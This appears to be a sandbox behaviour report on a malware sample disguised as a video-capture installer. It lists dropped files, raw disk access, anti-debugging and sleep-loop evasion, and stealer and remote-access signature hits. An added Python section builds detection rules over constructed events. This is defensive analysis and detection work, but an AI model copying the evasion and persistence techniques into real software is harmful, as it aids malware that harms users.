Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\LTDIS13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\gdiplus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- File created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- File created: C:\ProgramData\EShineEncoder\sqlite3.dll
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- File created: C:\ProgramData\EShineEncoder\EShineEncoder.exe
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- File created: C:\ProgramData\EShineEncoder\sqlite3.dll

                    Boot Survival

Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_00401A4F: CreateFileA,DeviceIoControl,GetLastError,CloseHandle (\\.\PhysicalDrive0)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_02DBF8A2: CreateFileA,DeviceIoControl,GetLastError,CloseHandle (\\.\PhysicalDrive0)
Note: both chains open \\.\PhysicalDrive0 and issue a single DeviceIoControl with no WriteFile or SetFilePointer, so whether this writes the boot sector or only queries the disk (for example to derive a hardware identifier) depends on the IOCTL code, which the report does not show; confirm it before treating the sample as a bootkit.
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_0040D1AC: StartServiceCtrlDispatcherA
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00423C04: IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_004241D4: IsIconic,SetActiveWindow,SetFocus
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_0042418C: IsIconic,SetActiveWindow
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_0041837C: IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00422854: SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00482EF8: IsIconic,GetWindowLongA,ShowWindow,ShowWindow
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00417590: IsIconic,GetCapture
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00417CC6: IsIconic,SetWindowPos
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00417CC8: IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_0041F110: GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (8 occurrences)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60920C91: rdtsc
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_00401B4B: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_02DBF9A6: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Window / User API: threadDelayed 2647
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Window / User API: threadDelayed 7254
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-VECUS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-AK5QD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\bjpeg23.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-MJRUC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-GSMNO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-NF0AU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-297HU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\is-U1N6A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-SILBO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\ltkrn13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\LTDIS13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\gdiplus.dll (copy)
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-5695)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- API coverage: 5.5 %
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID 7152 -- Thread sleep count: 2647 > 30
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID 7152 -- Thread sleep time: 5294000 ms total >= 30000 ms (2647 sleeps of 2000 ms)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID 3900 -- Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID 3900 -- Thread sleep time: 2220000 ms total >= 30000 ms (37 sleeps of 60000 ms)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID 7152 -- Thread sleep count: 7254 > 30
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID 7152 -- Thread sleep time: 14508000 ms total >= 30000 ms (7254 sleeps of 2000 ms)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00452A34: FindFirstFileA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00474D70: FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00462578: FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_004975B0: FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00463B04: SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00463F80: SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- Code function 0_2_00409B30: GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Thread delayed: delay time: 60000 ms
Source: videocapturesolution32.exe, 00000004.00000002.2973601937.0000000000A04000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW/g
Source: videocapturesolution32.exe, 00000004.00000002.2973601937.0000000000918000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2973601937.0000000000A04000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- API call chain: ExitProcess graph end node (graph_0-6735)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- API call chain: ExitProcess graph end node (graph_4-61129)
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Process information queried: ProcessInformation

                    Anti Debugging

Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep (graph_4-60821)
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60920C91: rdtsc
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_02DD01BE: RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00450294: GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_02DB648B: RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_02DC9528: SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00477F98: ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle
Source: C:\Windows\SysWOW64\net.exe -- Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_capture_solution_11223
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_0042E094: AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_02DBF85A: cpuid
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- Code function 0_2_004051FC: GetLocaleInfoA
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- Code function 0_2_00405248: GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00408558: GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_004085A4: GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_004583E8: GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- Code function 0_2_004026C4: GetSystemTime
Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp -- Code function 1_2_00455570: GetUserNameA
Source: C:\Users\user\Desktop\AbC0LBkVhr.exe -- Code function 0_2_00405CE4: GetVersionExA
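The behaviours recorded above map onto host telemetry that a detection engineer can check for: net.exe/net1.exe pausing a service named after the installer (video_capture_solution_11223), a PE dropped under C:\ProgramData\EShineEncoder by a binary running out of %LOCALAPPDATA%, a raw handle to \\.\PhysicalDrive0 from a non-system process, and the Sleep loops on TID 7152 (2647 and 7254 calls of 2000 ms against the 30-call / 30000 ms thresholds). The Python below is an added example, not part of the Joe Sandbox report or of the sample: it encodes those checks as rules and runs them over constructed Sysmon-style event records. The record shapes, the benign control events, the NT device path assumed for PhysicalDrive0 and the API-trace sleep samples are all made up for the example.

```python
"""Detection checks derived from the sandbox behaviours, applied to
constructed Sysmon-style events.  Added example; the events below are made
up to mirror the reported behaviour and follow Sysmon EventData field names
(Image, CommandLine, ParentImage, TargetFilename, Device)."""
import re
from collections import defaultdict

# Constructed sample events (assumed shapes, not taken from the report).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\net.exe",
     "CommandLine": "net pause video_capture_solution_11223",
     "ParentImage": r"C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\net1.exe",
     "CommandLine": r"C:\Windows\system32\net1 pause video_capture_solution_11223",
     "ParentImage": r"C:\Windows\SysWOW64\net.exe"},
    {"EventID": 11, "Image": r"C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe",
     "TargetFilename": r"C:\ProgramData\EShineEncoder\EShineEncoder.exe"},
    {"EventID": 11, "Image": r"C:\Program Files\Vendor\updater.exe",   # benign control
     "TargetFilename": r"C:\ProgramData\Vendor\update.log"},
    # Sysmon ID 9 (RawAccessRead).  \\.\PhysicalDrive0 is assumed to show up
    # as the NT path \Device\Harddisk0\DR0.  ID 9 records read operations, so
    # a DeviceIoControl-only query like 4_2_00401A4F may not produce it.
    {"EventID": 9, "Image": r"C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe",
     "Device": r"\Device\Harddisk0\DR0"},
    {"EventID": 9, "Image": r"C:\Windows\System32\svchost.exe",        # benign control
     "Device": r"\Device\HarddiskVolume2"},
]

USER_WRITABLE = re.compile(r"\\(AppData\\Local|AppData\\Roaming|ProgramData|Users\\Public|Windows\\Temp)\\", re.I)
NET_SERVICE_VERB = re.compile(r"^(?:.*\\)?net1?(?:\.exe)?\s+(pause|continue|stop|start)\s+(\S+)", re.I)
PE_EXT = (".exe", ".dll", ".sys")


def rule_net_service_control(ev):
    """net/net1 driving the service control manager.  'pause'/'continue' are
    rarely typed by users; a parent under a user-writable path is also enough."""
    if ev["EventID"] != 1:
        return None
    m = NET_SERVICE_VERB.match(ev.get("CommandLine", ""))
    if not m or not ev["Image"].lower().endswith(("\\net.exe", "\\net1.exe")):
        return None
    if m.group(1).lower() in ("pause", "continue") or USER_WRITABLE.search(ev.get("ParentImage", "")):
        return f"net {m.group(1).lower()} on service {m.group(2)}"
    return None


def rule_pe_drop_programdata(ev):
    """A PE written under ProgramData by a process that itself runs from a
    user-writable directory (how EShineEncoder.exe was staged)."""
    if ev["EventID"] != 11:
        return None
    target = ev.get("TargetFilename", "")
    if target.lower().endswith(PE_EXT) and "\\programdata\\" in target.lower() \
            and USER_WRITABLE.search(ev["Image"]):
        return f"PE dropped to {target}"
    return None


def rule_raw_disk_access(ev):
    """Raw physical-disk access from outside %SystemRoot%.  A PhysicalDrive
    handle serves both MBR tampering and disk-serial fingerprinting, so the
    hit still needs the IOCTL or a write to be confirmed."""
    if ev["EventID"] != 9:
        return None
    dev = ev.get("Device", "")
    if re.search(r"\\Device\\Harddisk\d+\\DR\d+", dev, re.I) and \
            not ev["Image"].lower().startswith("c:\\windows\\"):
        return f"raw access to {dev}"
    return None


RULES = (rule_net_service_control, rule_pe_drop_programdata, rule_raw_disk_access)


def evaluate(events):
    """Return (rule name, event index, detail) for every rule hit."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            detail = rule(ev)
            if detail:
                hits.append((rule.__name__, idx, detail))
    return hits


def sleep_loop_threads(sleep_calls, max_count=30, max_total_ms=30000):
    """Per-thread Sleep() aggregation with the report's thresholds: more than
    30 calls, or 30 s accumulated, on one thread.  sleep_calls: (tid, ms)."""
    count, total = defaultdict(int), defaultdict(int)
    for tid, ms in sleep_calls:
        count[tid] += 1
        total[tid] += ms
    return sorted(t for t in count if count[t] > max_count or total[t] >= max_total_ms)


# Constructed API-trace sample: one thread mimics TID 7152 (2647 x 2000 ms),
# the other sleeps a handful of times as an ordinary worker would.
SAMPLE_SLEEPS = [(7152, 2000)] * 2647 + [(4242, 500)] * 5

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(*hit)
    print("sleep-loop threads:", sleep_loop_threads(SAMPLE_SLEEPS))
```

Running the module prints the four expected hits (both net lines, the EShineEncoder.exe drop and the PhysicalDrive0 access) and flags TID 7152 only. Because Sysmon raises ID 9 for read operations through a \\.\ device handle, a DeviceIoControl-only query may never generate it; object-access auditing or EDR handle telemetry is the more reliable source for the raw-disk rule.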

                    Stealing of Sensitive Information

Source: Yara match -- File source: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: videocapturesolution32.exe PID: 7156, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match -- File source: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: videocapturesolution32.exe PID: 7156, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_609660FA: sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6090C1D6: sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60963143: sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6096A2BD: sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6096923E: sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6096A38C: sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6096748C: sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_609254B1: sqlite3_bind_zeroblob,sqlite3_mutex_leave
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094B407: sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6090F435: sqlite3_bind_parameter_index
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_609255D4: sqlite3_mutex_leave,sqlite3_bind_text16
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_609255FF: sqlite3_bind_text
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6096A5EE: sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094B54C: sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60925686: sqlite3_bind_int64,sqlite3_mutex_leave
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094A6C5: sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_609256E5: sqlite3_bind_int,sqlite3_bind_int64
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094B6ED: sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6092562A: sqlite3_bind_blob
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_60925655: sqlite3_bind_null,sqlite3_mutex_leave
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6094C64A: sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_609687A7: sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free
Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe -- Code function 4_2_6095F7F7: sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset
